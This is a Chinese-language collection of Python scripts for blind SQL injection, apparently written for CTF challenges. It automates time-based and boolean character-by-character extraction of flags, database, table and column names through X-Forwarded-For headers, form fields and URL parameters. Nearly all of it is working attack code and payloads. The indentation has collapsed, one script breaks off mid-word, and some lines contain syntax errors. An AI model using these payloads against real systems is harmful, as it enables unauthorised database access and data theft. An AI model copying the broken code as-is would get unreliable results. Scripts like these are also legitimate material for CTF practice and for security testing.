sql注入常用脚本

XFF时间盲注二分法

import requests url="http://49.235.141.207:25501/test_sql/sql_ip_insert/" flag='' for i in range(1,50): f1=flag top=127 low=33 while low<=top: mid=(top+low)//2 p1="127.0.0.1' and (case when ascii(substr((select flag from flag) from {} for 1))>{} then sleep(3) else 0 end) and '1".format(str(i),str(mid)) p2="127.0.0.1' and (case when ascii(substr((select flag from flag) from {} for 1))={} then sleep(3) else 0 end) and '1".format(str(i),str(mid)) headers1={'X-Forwarded-For':p1} headers2={'X-Forwarded-For':p2} try: print(i,mid) r1=requests.get(url,headers=headers2,timeout=3) except requests.exceptions.ReadTimeout as e: flag+=chr(mid) print(flag) break except Exception as e: pass else: try: r2=requests.get(url,headers=headers1,timeout=3) except requests.exceptions.ReadTimeout as e: low=mid+1 except Exception as e: pass else: top=mid-1 if flag==f1: break

二分法时间盲注

import requests url="http://e2237b8f-0ea4-4294-bbe7-007af8f88f8b.node3.buuoj.cn/register.php" flag='' proxies={ "http":"127.0.0.1:8080" } for i in range(1,50): f1=flag top=127 low=33 # print(1) while low<=top: mid=(top+low)//2 p1="aaaaa' || (case when ascii(substr((select*from flag) from {} for 1))>{} then sleep(3) else 0 end) || 'aaa".format(i,mid) p2="aaaaa' || (case when ascii(substr((select*from flag) from {} for 1))={} then sleep(3) else 0 end) || 'aaa".format(i,mid) data1={'email':'basb@qq.com','username':p1,'password':'1234'} data2={'email':'basb@qq.com','username':p2,'password':'1234'} try: print(i,mid) r1=requests.post(url,data=data2,timeout=3,proxies=proxies) except requests.exceptions.ReadTimeout as e: flag+=chr(mid) print(flag) break except Exception as e: pass else: try: r2=requests.post(url,data=data1,timeout=3,proxies=proxies) except requests.exceptions.ReadTimeout as e: low=mid+1 except Exception as e: pass else: top=mid-1 if flag==f1: break

二分法盲注

import requests url="http://116.63.149.36:50048/file_id.php?id=" flag='' for i in range(1,50): f1=flag top=127 low=33 while low<=top: mid=(top+low)//2 # data={'id':'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(str(i),str(mid))} # data1={'id':'if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(str(i),str(mid))} data='if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(str(i),str(mid)) data1='if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(str(i),str(mid)) try: r1=requests.post(url+data1) print(i,mid) if 'glzjin' in r1.text: flag+=chr(mid) print(flag) break r=requests.post(url+data) if "Error" in r.text: top=mid-1 if 'glzjin' in r.text: low=mid+1 except Exception as e: pass if flag==f1: break

时间盲注

import requests url = 'http://139.199.182.61/index.php?id=1'' lendata=7 # for i in range(1, 50): # try: # payload1 = '/**/and/**/if(length(database())={},sleep(3),1)#'.format(i) # r = requests.get(url + payload1, timeout=3) # except requests.exceptions.ReadTimeout as e: # lendata = i # print("数据库长度为"+str(i)) # break databases=['easysql'] # database="" # for j in range(1,lendata+1): # for k in range(33,127): # payload2 = '/**/and/**/if(ascii(substr(database(),{},1))={},sleep(3),1)#'.format(j, k) # print(payload2) # try: # r=requests.get(url+payload2,timeout=3) # except requests.exceptions.ReadTimeout as e: # database+=chr(k) # print(database) # break # except Exception as w: # pass # database='' # databases=[] # for k in range(0, 10): # flag1=len(databases) # for i in range(1,50): # flag=database # for j in range(33,127): # payload3='/**/and/**/if(ascii(substr((selselectect/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/{},1),{},1))={},sleep(3),1)#'.format(k , i, j) # try: # print(payload3) # r=requests.get(url+payload3,timeout=3) # except requests.exceptions.ReadTimeout as e: # database+=chr(j) # print(database) # break # except Exception as w: # pass # if flag==database: # break # databases.append(database) # if flag1==len(databases): # break # print(databases) tables=['f1aggggggggggggg'] # table='' # # tables=['users'] # for k in range(0, 10): # flag1=len(tables) # for i in range(1,50): # flag=table # for j in range(33,127): # payload3='/**/and/**/if(ascii(substr((selselectect/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/{},1),{},1))={},sleep(3),1)#'.format(k , i, j) # try: # print(payload3) # r=requests.get(url+payload3,timeout=3) # except requests.exceptions.ReadTimeout as e: # table+=chr(j) # print(table) # break # except Exception as w: # pass # if flag==table: # tables.append(table) # table="" # break # if len(tables)=flag1 # break # print(tables) columns=['fl4444444g'] # column='' # for te in tables: # for k in range(0,5): # flag1=len(columns) # for i in range(1,50): # flag=column # for j in range(33,127): # payload4='/**/and/**/if(ascii(substr((seselectlect/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name="{}" limit/**/{},1),{},1))={},sleep(3),1)#'.format(te,k,i,j) # try: # r=requests.get(url+payload4,timeout=3) # print(payload4) # except requests.exceptions.ReadTimeout as e: # column+=chr(j) # print(column) # break # except Exception as w: # pass # if flag==column: # columns.append(column) # column='' # break # if len(columns)=flag1: # break; # print(columns) # data='' # for db in databases: # for ta in tables: # for co in columns: # for k in range(0,10): # for i in range(1,50): # flag=data # for j in range(33,127): # payload5='/**/and/**/if(ascii(substring((seselectlect/**/{}/**/from/**/{}.{}/**/limit/**/{},1),{},1))={},sleep(3),1)#'.format(co,db,ta,k,i,j) # try: # r=requests.get(url+payload5,timeout=3) # print(payload5) # except requests.exceptions.ReadTimeout as e: # data+=chr(j) # print(data) # break # except Exception as w: # pass # if flag==data: # data='' # brea

其他

import requests s=requests.session() url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php' table="" for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j)) #爆字段名 flag #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j)) #读取flag #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j)) ra = s.get(url=url + '?id=0/**/or/**/' + payload).text if 'I asked nothing' in ra: table += chr(j) print(table) break import requests url = "http://124.156.121.112:28069/?id=-1'/**/" def db(url): #爆库名 for i in range(1,5): for j in range(32,128): u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#" s = url+u print(s) r = requests.get(s) if 'By Rudyard Kipling' in r.text: print(chr(j)) def table(url): #爆表名 for i in range(4): table_name='' for j in range(1,6): for k in range(48,128): u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#" s = url+u print(s) r = requests.get(s) if 'By Rudyard Kipling' in r.text: table_name+=chr(k) print(table_name)